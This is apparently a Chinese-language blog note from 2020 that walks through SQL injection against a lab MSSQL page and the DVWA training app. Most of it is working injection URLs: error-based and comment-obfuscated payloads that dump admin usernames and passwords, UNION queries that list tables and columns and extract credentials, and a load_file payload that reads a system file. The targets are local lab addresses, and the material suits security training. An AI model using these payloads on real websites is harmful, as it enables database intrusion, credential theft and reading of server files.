2020-03-31public权限下获取数据库数据（mssql注入）、Mysql注入

public权限下获取数据库数据（mssql注入）

获取网站当前数据库

http://192.168.1.55/sqlserver/1.aspx?xxser=1 and db_name() =0--

数据库名名

爆表名及字段名

http://192.168.1.55/sqlserver/1.aspx?xxser=1 having 1=1--

表名及字段

http://192.168.1.55/sqlserver/1.aspx?xxser=1 group by admin.id having 1=1--

http://192.168.1.55/sqlserver/1.aspx?xxser=1group by admin.id,admin.name having 1=1--

http://192.168.1.55/sqlserver/1.aspx?xxser=1 and (select top 1 name from admin)>0

用户名

获取用户名和密码
http://192.168.1.55/sqlserver/1.aspx?xxser=1/**/and/**/(select/**/top/**/1/**/isnull(cast([id]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([name]/**/as/**/nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([password]/**/as/**/nvarchar(4000)),char(32))/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/and/**/id/**/not/**/in/**/(select/**/top/**/0/**/id/**/from/**/[testdb]..[admin]/**/where/**/1=1/**/group/**/by/**/id))>0/**/and/**/1=1

用户名和密码

Mysql注入

dvwa

查询数据库的版本。

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,version()+--+&Submit=Submit#

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%20user(),database()+--+&Submit=Submit#

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x64767761+--+&Submit=Submit#

表名

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x7573657273+--+&Submit=Submit#

字段

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20UNION%20SELECT%20user,password%20from%20users+--+&Submit=Submit#

用户名和密码

http://192.168.0.103:8000/dvwa/vulnerabilities/sqli/?id=1%27%20union%20select%201,load_file(%27c:\\boot.ini%27)+--+&Submit=Submit#

在mysql安装目录的my.ini文件中的[mysqld]添加secure_file_priv = ' '

执行命令show variables like '%secure%';查看secure_file_priv的值（这里已经将secure_file_priv的值设为空